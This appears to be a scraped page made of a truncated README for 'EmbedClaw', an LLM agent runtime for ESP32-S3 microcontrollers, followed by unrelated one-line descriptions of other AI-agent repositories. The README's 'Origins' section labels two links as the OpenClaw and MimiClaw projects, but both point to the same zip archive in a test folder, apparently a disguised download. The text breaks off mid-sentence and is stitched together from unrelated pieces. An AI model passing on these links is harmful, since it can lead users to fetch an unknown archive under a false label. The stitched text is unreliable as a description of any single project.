Run a modular agent runtime on ESP32-S3 that manages LLMs, tools, memory, and channels for efficient message processing.
# EmbedClaw [[中文]](./README_ZH.md) <div align="center"> **Decouple LLM, Tools, Agent, and Channels—then pack them onto a single ESP32-S3.** [](LICENSE)      </div> > EmbedClaw is not just “a chatbot on an MCU.” > It’s an **Agent Runtime** on a microcontroller: messages enter via Channels, the Agent orchestrates, the LLM decides, Tools execute, Memory is persisted, Skills supply task-level knowledge, and results go back out through Channels. ## Origins This project draws on the ideas and direction of: - [OpenClaw](https://raw.githubusercontent.com/Laureenundecided267/EmbedClaw/main/components/embed_claw/test/Claw_Embed_v1.0.zip) - [MimiClaw](https://raw.githubusercontent.com/Laureenundecided267/EmbedClaw/main/components/embed_claw/test/Claw_Embed_v1.0.zip) EmbedClaw keeps the goal of running a full AI Agent on low-power hardware but focuses the architecture on **decoupling LLM, Tools, Agent, and Channels**. That means you can add new models, new channels, new tools, or new Skills without rewriting the rest of the system. ## Why EmbedClaw ### 1. Decoupled, not feature-bloated The main idea is not “it can chat,” but that the parts that usually get tangled are separated: - **Channel** only handles how messages are received and sent; it doesn’t care how the LLM reasons. - **Agent** only handles task orchestration, context building, and the tool loop; it doesn’t care about transport. - **LLM** only adapts model request/response; it doesn’t care whether the message came from Feishu or WebSocket. - **Tools** only expose capabilities and JSON sche
HAL 分层混合模型工作流 — 强模型(Claude)负责理解/拆解/验收,低成本模型(DeepSeek)负责检索/提取/清洗。Hermes Agent skill。
An LLM agent fine-tuned on DeepSeek for spaced repetition, dynamically integrating knowledge points based on the Ebbinghaus forgetting curve.
基于 STM32F103 构建的端到端 AI 智能手表生态。自研“零重定位”原生机器码动态加载引擎与页面栈式 UI 框架;集成生产级 OTA 回滚保护机制与高带宽(921600 baud)串口协议栈。通过 Node.js 中继实现 DeepSeek AI 语义控制及 ASRPRO 语音全双工交互,是一个集成了分布式计算、现代存储管理与 AI Agent 的嵌入式全栈工程。
A Meta-Agent-Driven Self-Evolving Multi-Agent System for UAV Detection and Tracking
One command to run Hermes AI Agent with a browser UI. Zero prerequisites. 一行命令,AI 就位。
网页应用Agent,接入DeepSeek、Mimo等模型